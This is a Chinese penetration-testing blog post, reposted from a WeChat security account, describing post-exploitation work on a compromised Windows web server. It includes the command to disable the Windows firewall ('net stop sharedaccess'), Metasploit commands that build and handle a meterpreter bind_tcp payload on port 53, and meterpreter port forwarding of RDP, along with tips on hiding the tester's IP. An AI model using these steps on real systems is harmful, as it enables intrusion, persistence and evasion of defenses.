记一次绕系统防火墙反弹案例

admin 2021年10月16日08:39:43安全文章评论26 views1726字阅读5分45秒阅读模式

0x01 前言

Date/time:2016年,这次遇到的问题有些奇葩,这里简单记录下测试过程。已经拿到目标主机最高权限,但是在转发3389端口时遇到了问题。

尝试了《记一次绕防火墙反弹转发小结》文中所有方法都被拦截了,也测试了些穿透性较好的端口还是不行,如:53/110/443/1040/8080等
反向连接:1. Lcx、2. Aspx Client、3.1 Reverse_tcp、3.3 Reverse_http、3.3 Reverse_https
正向连接:3.2 Bind_tcp
HTTP隧道:4. reDuh_Gui、5. Http_TunnareGeorgneo_reGeorg


0x02 简单分析

根据对目标主机的分析,在WebShell上对多个域名和公网IP进行Ping测试,确定这台主机是ping不通域名和其他公网IP的(以前有遇到过不能Ping域名,但可以Ping公网IP的情况)。
记一次绕系统防火墙反弹案例

笔者根据以往的经验可以肯定是有防火墙之类的东西拦截了,并没有为我们建立一个正常的TCP连接。
记一次绕系统防火墙反弹案例

以前写过一篇类似文章《Metasploit bind_tcp实战应用》,直接使用Nmap扫描目标主机端口状态为close的端口作为监听端口,用bind_tcp正向连接方式绕过防火墙限制来获取会话 ,然后再用portfwd命令将3389远程端口给转发出来。

而在这次案例中测试的并不是那么顺利,使用Nmap对目标主机IP进行扫描发现只开放了80端口,而且状态为Open,所以不能直接用以前那篇文章中的方式来绕过防火墙的限制。
记一次绕系统防火墙反弹案例

0x03 绕过方式

不再详细记录测试过程了,直接说绕过方式,其实挺简单的,直接在中国菜刀的虚拟终端执行以下命令关闭目标主机防火墙,然后再用Nmap扫描发现多出2个状态为close的端口:53、443。
net stop sharedaccess

记一次绕系统防火墙反弹案例
记一次绕系统防火墙反弹案例

接着我们再用那篇文章中提到的bind_tcp来获取会话。还有一种利用方式就是端口复用,不过会将IIS服务停掉,同时将终端服务的3389端口改为80端口,由于这样动静太大,所以就不去尝试了。
msfpayload windows/meterpreter/bind_tcp LPORT=53 X > /tmp/53.exe
use exploit/mutil/handlerset PAYLOADY windows/meterpreter/bind_tcpset RHOST 218.**.***.37set LPORT 53exploit
记一次绕系统防火墙反弹案例

0x04 小小技巧

无意间发现的一个小知识点,使用Meterpreter的portfwd进行端口转发时不会暴露我们连接RDP的真实IP地址,而是在目标主机上随机开放1个端口与他的3389端口进行连接,大家可以自己去和其他端口转发工具做下对比就知道区别在哪了,而且还可以用来绕过一些安全防护。
meterpreter > portfwd add -l 1234 -r 127.0.0.1 -p 3389
记一次绕系统防火墙反弹案例

注:如果我们没有删除portfwd已开启的端口转发,直接使用migrate命令执行进程迁移时可能会断掉已开启的所有端口转发,换句话说就是在执行进程迁移前必须先删除已开启的端口转发。



关注公众号回复“9527”可免费获取一套HTB靶场文档和视频,1120”安全参考等安全杂志PDF电子版,1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包还在等什么?赶紧点击下方名片关注学习吧!

记一次绕系统防火墙反弹案例

潇湘信安

一个不会编程、挖SRC、代码审计、渗透测试的业余网络安全人员,该公众号主要用于分享个人学习笔记、安全经验以及各类疑难杂症!

93篇原创内容

公众号


推 荐 阅 读




记一次绕系统防火墙反弹案例
记一次绕系统防火墙反弹案例
记一次绕系统防火墙反弹案例

本文推荐实操:Linux防火墙(复制链接体验吧)
https://www.hetianlab.com/expc.do?ec=8b3a16a6-3eb7-4035-a94b-26baa0d05d51&pk_campaign=weixin-wemedia#stu

通过该实验了解Linux防火墙iptables实现原理,掌握iptables基本使用方法,能够利用iptables对操作系统进行加固。


记一次绕系统防火墙反弹案例
“阅读原文”体验免费靶场!


本文始发于微信公众号(合天网安实验室):记一次绕系统防火墙反弹案例

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月16日08:39:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  记一次绕系统防火墙反弹案例 http://cn-sec.com/archives/393082.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: